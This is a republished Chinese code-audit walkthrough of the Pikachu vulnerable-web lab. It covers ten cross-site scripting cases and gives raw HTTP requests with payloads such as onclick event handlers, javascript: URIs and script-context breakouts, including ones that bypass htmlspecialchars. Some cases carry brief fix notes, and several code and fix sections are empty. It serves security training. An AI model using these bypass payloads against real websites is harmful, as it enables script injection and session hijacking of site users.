1、皮卡丘代码审计(1)
XSS
1、反射性xss(一)
限制
submit参数不能为空
前台/后台:前台
复现
GET /vul/xss/xss_reflected_get.php?message=qws<h1>ssss</h1>ggg&submit=submit HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xss_reflected_get.php?message=23es&submit=submit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
代码
修复
使用htmlspecialchars函数进行html实体化编码
2、反射性xss(二)
限制
submit参数不能为空
前台/后台:后台
复现
POST /vul/xss/xsspost/xss_reflected_post.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xsspost/xss_reflected_post.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
message=111<h1>aaa</h1>s&submit=submit
代码
修复
3、存储性xss
限制
message参数不能为空
复现
POST /vul/xss/xss_stored.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xss_stored.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
message=aa<h1>sss</h1>3&submit=submit
代码
修复
4、dom型xss(一)
限制
复现
<script>
function domxss(){
var str = document.getElementById("text").value;
document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
}
//试试:'><img src="#" onmouseover="alert('xss')">
//试试:' onclick="alert('xss')">,闭合掉就行
</script>
代码
修复
5、dom型xss(二)
限制
复现
<script>
function domxss(){
var str = window.location.search;
var txss = decodeURIComponent(str.split("text=")[1]);
var xss = txss.replace(/\+/g,' ');
// alert(xss);
document.getElementById("dom").innerHTML = "<a href='"+xss+"'>就让往事都随风,都随风吧</a>";
}
//试试:'><img src="#" onmouseover="alert('xss')">
//试试:' onclick="alert('xss')">,闭合掉就行
</script>
代码
修复
6、xss盲打
限制
前台/后台:前台、后台
复现
POST /vul/xss/xssblind/xss_blind.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 84
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xssblind/xss_blind.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
content=%3Ch1%3Eaaa%3C%2Fh1%3E&name=%3Ch1%3Eccc%3C%2Fh1%3E&submit=%E6%8F%90%E4%BA%A4
GET /vul/xss/xssblind/admin.php HTTP/1.1
Host: bbb.com:8882
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
代码
修复
7、xss之过滤
限制
message参数不能为空
对<script过滤
复现
GET /vul/xss/xss_01.php?message=111%3Ch1%3Eaaa%3C%2Fh1%3Es&submit=submit HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xss_01.php?message=%27sss&submit=submit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
代码
修复
8、xss之htmlspecialchars
xss之htmlspecialchars方法:
1) ' onclick='alert(111)'
2) ' onmouseover='alert(1)
3) ' onmouseover='javascript:alert(1)'
限制
htmlspecialchars函数过滤
message不能为空
复现
GET /vul/xss/xss_02.php?message=%27+onclick%3D%27alert%28111%29%27&submit=submit HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xss_02.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
代码
修复
9、xss之href
限制
htmlspecialchars函数过滤
$message=htmlspecialchars($_GET['message'],ENT_QUOTES)
message不能为空
复现
GET /vul/xss/xss_03.php?message=javascript%3Aalert%281%29&submit=submit HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xss_03.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
代码
这里虽然有过滤,但是传入的payload,并不会被函数处理(不含有<>'")
修复
(filter_var($message,FILTER_VALIDATE_URL)) 来判断传入的参数是否是一个有效的url
10、xss之js
补充
此题目作者的含义:
复现时,需要将代码的内的注释去掉:
限制
message不能为空
复现
GET /vul/xss/xss_04.php?message=%27%3Balert%281%29%3B%2F%2F&submit=submit HTTP/1.1
Host: bbb.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com/vul/xss/xss_04.php?message=%27%3Balert%281%29%3B%2F%2F&submit=submit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=fpm02f02d29h0gn46rpu4jrj59
Connection: close
代码
接收参数
将接收的参数输出
修复
这里假设使用htmlspecialchars函数进行处理
输入的“ ' ”被转义为html实体化编码,影响最初的功能设计
所以这里使用“ \ ”过滤,
再次传入恶意参数,
传入的字符串被“原样输出”,且没有被浏览器解析。
原文地址:https://blog.csdn.net/YINZHE_/article/details/136412074
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!